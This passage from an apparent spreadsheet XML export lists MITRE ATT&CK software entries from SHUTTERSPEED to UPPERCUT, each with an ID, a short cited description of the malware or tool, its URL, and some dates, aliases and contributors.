    <t>SHUTTERSPEED</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0217</t>
  </si>
  <si>
    <t>S0533</t>
  </si>
  <si>
    <t>SLOTHFULMEDIA</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.(Citation: CISA MAR SLOTHFULMEDIA October 2020)(Citation: Costin Raiu IAmTheKing October 2020) It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.(Citation: USCYBERCOM SLOTHFULMEDIA October 2020)(Citation: Kaspersky IAmTheKing October 2020)  
In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is part of an activity cluster it refers to as "IAmTheKing".(Citation: Kaspersky IAmTheKing October 2020) ESET also noted code similarity between [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) and droppers used by a group it refers to as "PowerPool".(Citation: ESET PowerPool Code October 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0533</t>
  </si>
  <si>
    <t>JackOfHearts, QueenOfClubs</t>
  </si>
  <si>
    <t>S0218</t>
  </si>
  <si>
    <t>SLOWDRIFT</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0218</t>
  </si>
  <si>
    <t>S0159</t>
  </si>
  <si>
    <t>SNUGRIDE</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0159</t>
  </si>
  <si>
    <t>S0157</t>
  </si>
  <si>
    <t>SOUNDBITE</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0157</t>
  </si>
  <si>
    <t>S0035</t>
  </si>
  <si>
    <t>SPACESHIP</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0035</t>
  </si>
  <si>
    <t>S0390</t>
  </si>
  <si>
    <t>SQLRat</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://attack.mitre.org/groups/G0046) has been observed using it.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0390</t>
  </si>
  <si>
    <t>S0559</t>
  </si>
  <si>
    <t>SUNBURST</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0559</t>
  </si>
  <si>
    <t>05 January 2021</t>
  </si>
  <si>
    <t>Solorigate</t>
  </si>
  <si>
    <t>Matt Brenton, Zurich Insurance Group</t>
  </si>
  <si>
    <t>S0562</t>
  </si>
  <si>
    <t>SUNSPOT</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) is an implant that injected the [SUNBURST](https://attack.mitre.org/software/S0559) backdoor into the SolarWinds Orion software update framework. It was used by [APT29](https://attack.mitre.org/groups/G0016) since at least February 2020.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0562</t>
  </si>
  <si>
    <t>12 January 2021</t>
  </si>
  <si>
    <t>S0578</t>
  </si>
  <si>
    <t>SUPERNOVA</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://attack.mitre.org/groups/G0016)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://attack.mitre.org/software/S0578) may have been used by the China-based threat group SPIRAL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: SolarWinds Advisory Dec 2020)(Citation: CISA Supernova Jan 2021)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0578</t>
  </si>
  <si>
    <t>18 February 2021</t>
  </si>
  <si>
    <t>S0519</t>
  </si>
  <si>
    <t>SYNful Knock</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0519</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>S0464</t>
  </si>
  <si>
    <t>SYSCON</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0464</t>
  </si>
  <si>
    <t>S0074</t>
  </si>
  <si>
    <t>Sakula</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0074</t>
  </si>
  <si>
    <t>Sakurel, VIPER</t>
  </si>
  <si>
    <t>S0370</t>
  </si>
  <si>
    <t>SamSam</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0370</t>
  </si>
  <si>
    <t>15 April 2019</t>
  </si>
  <si>
    <t>18 April 2019</t>
  </si>
  <si>
    <t>Samas</t>
  </si>
  <si>
    <t>S0053</t>
  </si>
  <si>
    <t>SeaDuke</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0053</t>
  </si>
  <si>
    <t>SeaDaddy, SeaDesk</t>
  </si>
  <si>
    <t>S0345</t>
  </si>
  <si>
    <t>Seasalt</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0345</t>
  </si>
  <si>
    <t>S0382</t>
  </si>
  <si>
    <t>ServHelper</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0382</t>
  </si>
  <si>
    <t>S0596</t>
  </si>
  <si>
    <t>ShadowPad</t>
  </si>
  <si>
    <t xml:space="preserve">[ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0596</t>
  </si>
  <si>
    <t>POISONPLUG.SHADOW</t>
  </si>
  <si>
    <t>S0140</t>
  </si>
  <si>
    <t>Shamoon</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0140</t>
  </si>
  <si>
    <t>Disttrack</t>
  </si>
  <si>
    <t>S0546</t>
  </si>
  <si>
    <t>SharpStage</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0546</t>
  </si>
  <si>
    <t>S0444</t>
  </si>
  <si>
    <t>ShimRat</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://attack.mitre.org/software/S0444)" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0444</t>
  </si>
  <si>
    <t>12 May 2020</t>
  </si>
  <si>
    <t>S0445</t>
  </si>
  <si>
    <t>ShimRatReporter</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0445</t>
  </si>
  <si>
    <t>S0589</t>
  </si>
  <si>
    <t>Sibot</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0589</t>
  </si>
  <si>
    <t>S0007</t>
  </si>
  <si>
    <t>Skeleton Key</t>
  </si>
  <si>
    <t>[Skeleton Key](https://attack.mitre.org/software/S0007) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to [Skeleton Key](https://attack.mitre.org/software/S0007) is included as a module in [Mimikatz](https://attack.mitre.org/software/S0002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0007</t>
  </si>
  <si>
    <t>S0468</t>
  </si>
  <si>
    <t>Skidmap</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0468</t>
  </si>
  <si>
    <t>09 June 2020</t>
  </si>
  <si>
    <t>26 June 2020</t>
  </si>
  <si>
    <t>S0226</t>
  </si>
  <si>
    <t>Smoke Loader</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware.
[Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0226</t>
  </si>
  <si>
    <t>Dofoil</t>
  </si>
  <si>
    <t>S0273</t>
  </si>
  <si>
    <t>Socksbot</t>
  </si>
  <si>
    <t>[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that  abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0273</t>
  </si>
  <si>
    <t>S0516</t>
  </si>
  <si>
    <t>SoreFang</t>
  </si>
  <si>
    <t>[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0516</t>
  </si>
  <si>
    <t>S0543</t>
  </si>
  <si>
    <t>Spark</t>
  </si>
  <si>
    <t xml:space="preserve">
[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0543</t>
  </si>
  <si>
    <t>15 December 2020</t>
  </si>
  <si>
    <t>S0374</t>
  </si>
  <si>
    <t>SpeakUp</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0374</t>
  </si>
  <si>
    <t>29 March 2020</t>
  </si>
  <si>
    <t>Linux, macOS</t>
  </si>
  <si>
    <t>S0058</t>
  </si>
  <si>
    <t>SslMM</t>
  </si>
  <si>
    <t>[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0058</t>
  </si>
  <si>
    <t>S0188</t>
  </si>
  <si>
    <t>Starloader</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0188</t>
  </si>
  <si>
    <t>Alan Neville, @abnev</t>
  </si>
  <si>
    <t>S0380</t>
  </si>
  <si>
    <t>StoneDrill</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://attack.mitre.org/groups/G0064).(Citation: FireEye APT33 Sept 2017)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0380</t>
  </si>
  <si>
    <t>14 May 2019</t>
  </si>
  <si>
    <t>DROPSHOT</t>
  </si>
  <si>
    <t>S0142</t>
  </si>
  <si>
    <t>StreamEx</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0142</t>
  </si>
  <si>
    <t>S0491</t>
  </si>
  <si>
    <t>StrongPity</t>
  </si>
  <si>
    <t>[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0491</t>
  </si>
  <si>
    <t>20 July 2020</t>
  </si>
  <si>
    <t>S0018</t>
  </si>
  <si>
    <t>Sykipot</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0018</t>
  </si>
  <si>
    <t>S0242</t>
  </si>
  <si>
    <t>SynAck</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelgänging May 2018) (Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0242</t>
  </si>
  <si>
    <t>S0060</t>
  </si>
  <si>
    <t>Sys10</t>
  </si>
  <si>
    <t>[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0060</t>
  </si>
  <si>
    <t>S0096</t>
  </si>
  <si>
    <t>Systeminfo</t>
  </si>
  <si>
    <t>[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0096</t>
  </si>
  <si>
    <t>S0098</t>
  </si>
  <si>
    <t>T9000</t>
  </si>
  <si>
    <t>[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0098</t>
  </si>
  <si>
    <t>S0586</t>
  </si>
  <si>
    <t>TAINTEDSCRIBE</t>
  </si>
  <si>
    <t>[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0586</t>
  </si>
  <si>
    <t>05 March 2021</t>
  </si>
  <si>
    <t>S0164</t>
  </si>
  <si>
    <t>TDTESS</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0164</t>
  </si>
  <si>
    <t>S0560</t>
  </si>
  <si>
    <t>TEARDROP</t>
  </si>
  <si>
    <t>[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0560</t>
  </si>
  <si>
    <t>S0146</t>
  </si>
  <si>
    <t>TEXTMATE</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0146</t>
  </si>
  <si>
    <t>S0131</t>
  </si>
  <si>
    <t>TINYTYPHON</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) is a backdoor  that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0131</t>
  </si>
  <si>
    <t>S0436</t>
  </si>
  <si>
    <t>TSCookie</t>
  </si>
  <si>
    <t>[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0436</t>
  </si>
  <si>
    <t>S0199</t>
  </si>
  <si>
    <t>TURNEDUP</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0199</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek; Ryan Becwar</t>
  </si>
  <si>
    <t>S0263</t>
  </si>
  <si>
    <t>TYPEFRAME</t>
  </si>
  <si>
    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0263</t>
  </si>
  <si>
    <t>S0011</t>
  </si>
  <si>
    <t>Taidoor</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) is malware that has been used since at least 2010, primarily to target Taiwanese government organizations. (Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0011</t>
  </si>
  <si>
    <t>S0467</t>
  </si>
  <si>
    <t>TajMahal</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0467</t>
  </si>
  <si>
    <t>08 June 2020</t>
  </si>
  <si>
    <t>S0057</t>
  </si>
  <si>
    <t>Tasklist</t>
  </si>
  <si>
    <t>The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0057</t>
  </si>
  <si>
    <t>S0595</t>
  </si>
  <si>
    <t>ThiefQuest</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.(Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0595</t>
  </si>
  <si>
    <t>EvilQuest, MacRansom.K</t>
  </si>
  <si>
    <t>S0004</t>
  </si>
  <si>
    <t>TinyZBot</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0004</t>
  </si>
  <si>
    <t>S0183</t>
  </si>
  <si>
    <t>Tor</t>
  </si>
  <si>
    <t>[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0183</t>
  </si>
  <si>
    <t>S0266</t>
  </si>
  <si>
    <t>TrickBot</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in United States, Canada, UK, Germany, Australia, Austria, Ireland, London, Switzerland, and Scotland. TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0266</t>
  </si>
  <si>
    <t>10 April 2021</t>
  </si>
  <si>
    <t>TSPY_TRICKLOAD, Totbrick</t>
  </si>
  <si>
    <t>Cybereason Nocturnus, @nocturnus; Daniyal Naeem, BT Security; FS-ISAC; Omkar Gudhate</t>
  </si>
  <si>
    <t>S0094</t>
  </si>
  <si>
    <t>Trojan.Karagany</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY )</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0094</t>
  </si>
  <si>
    <t>14 October 2020</t>
  </si>
  <si>
    <t>Karagany, xFrost</t>
  </si>
  <si>
    <t>S0001</t>
  </si>
  <si>
    <t>Trojan.Mebromi</t>
  </si>
  <si>
    <t>[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0001</t>
  </si>
  <si>
    <t>S0178</t>
  </si>
  <si>
    <t>Truvasys</t>
  </si>
  <si>
    <t>[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0178</t>
  </si>
  <si>
    <t>S0116</t>
  </si>
  <si>
    <t>UACMe</t>
  </si>
  <si>
    <t>[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0116</t>
  </si>
  <si>
    <t>S0333</t>
  </si>
  <si>
    <t>UBoatRAT</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) is a remote access tool that was identified in May 2017.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0333</t>
  </si>
  <si>
    <t>S0275</t>
  </si>
  <si>
    <t>UPPERCUT</t>
  </si>
  <si>
